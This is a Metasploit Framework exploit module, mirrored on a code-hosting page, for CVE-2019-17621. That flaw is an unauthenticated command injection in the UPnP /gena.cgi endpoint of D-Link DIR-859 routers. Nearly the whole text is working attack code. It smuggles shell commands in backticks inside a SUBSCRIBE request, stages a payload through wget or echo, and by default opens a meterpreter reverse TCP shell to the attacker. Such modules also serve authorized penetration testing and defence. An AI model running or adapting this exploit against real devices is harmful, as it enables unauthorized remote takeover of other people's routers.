Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/linux/upnp/dlink_dir859_subscribe_exec.rb
19758 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::HttpClient

10
  include Msf::Exploit::CmdStager

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'D-Link DIR-859 Unauthenticated Remote Command Execution',

17
        'Description' => %q{

18
          D-Link DIR-859 Routers are vulnerable to OS command injection via the UPnP

19
          interface. The vulnerability exists in /gena.cgi (function genacgi_main() in

20
          /htdocs/cgibin), which is accessible without credentials.

21
        },

22
        'Author' => [

23
          'Miguel Mendez Z., @s1kr10s', # Vulnerability discovery and initial exploit

24
          'Pablo Pollanco P.' # Vulnerability discovery and metasploit module

25
        ],

26
        'License' => MSF_LICENSE,

27
        'References' => [

28
          [ 'CVE', '2019-17621' ],

29
          [ 'URL', 'https://medium.com/@s1kr10s/d94b47a15104' ]

30
        ],

31
        'DisclosureDate' => '2019-12-24',

32
        'Privileged' => true,

33
        'Platform' => 'linux',

34
        'Arch' => ARCH_MIPSBE,

35
        'DefaultOptions' => {

36
          'PAYLOAD' => 'linux/mipsbe/meterpreter_reverse_tcp',

37
          'CMDSTAGER::FLAVOR' => 'wget',

38
          'RPORT' => '49152'

39
        },

40
        'Targets' => [

41
          [ 'Automatic',	{} ],

42
        ],

43
        'CmdStagerFlavor' => %w[echo wget],

44
        'DefaultTarget' => 0,

45
        'Notes' => {

46
          'Stability' => [CRASH_SAFE],

47
          'SideEffects' => [ARTIFACTS_ON_DISK],

48
          'Reliability' => [REPEATABLE_SESSION]

49
        }

50
      )

51
    )

52
  end

53


54
  def execute_command(cmd, _opts)

55
    callback_uri = 'http://192.168.0.' + Rex::Text.rand_text_hex(2).to_i(16).to_s +

56
                   ':' + Rex::Text.rand_text_hex(4).to_i(16).to_s +

57
                   '/' + Rex::Text.rand_text_alpha(3..12)

58
    send_request_raw({

59
      'uri'	=> "/gena.cgi?service=`#{cmd}`",

60
      'method' =>	'SUBSCRIBE',

61
      'headers' =>

62
      {

63
        'Callback' => "<#{callback_uri}>",

64
        'NT' => 'upnp:event',

65
        'Timeout' => 'Second-1800'

66
      }

67
    })

68
  rescue ::Rex::ConnectionError

69
    fail_with(Failure::Unreachable, "#{rhost}:#{rport} - Could not connect to the webservice")

70
  end

71


72
  def exploit

73
    execute_cmdstager(linemax: 500)

74
  end

75
end

76


77